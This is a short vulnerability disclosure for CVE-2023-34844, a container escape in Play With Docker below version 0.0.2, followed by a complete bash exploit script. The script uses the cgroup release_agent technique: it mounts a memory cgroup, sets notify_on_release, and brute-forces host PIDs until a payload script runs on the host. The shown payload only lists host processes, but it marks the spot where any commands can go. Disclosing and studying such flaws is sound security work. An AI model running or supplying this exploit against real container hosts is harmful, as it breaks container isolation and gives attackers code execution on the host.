https://labs.play-with-docker.com/
https://github.com/play-with-docker/play-with-docker

Play With Docker < 0.0.2 has an insecure CAP_SYS_ADMIN privileged mode, since CAP_SYS_ADMIN must be used, but does not set app armor, causing the docker container to escape

### Description

Play With Docker < 0.0.2 has an insecure CAP_SYS_ADMIN privileged mode causing the docker container to escape

ID:CVE-2023-34844

PPRODUCT:Play With Docker

VERSION: < 0.0.2

PROBLEM TYPE:Docker container to escape


https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F1.png


https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F2.png


https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F3.png


https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F4.png

### full exploit
```bash
#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
  if [ $((${TPID} % 100)) -eq 0 ]
  then
    echo "Checking pid ${TPID}"
    if [ ${TPID} -gt ${MAX_PID} ]
    then
      echo "Exiting at ${MAX_PID} :-("
      exit 1
    fi
  fi
  # Set the release_agent path to the guessed pid
  echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
  # Trigger execution of the release_agent
  sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
  TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}

```


Report disclosed by GhostAatrox :P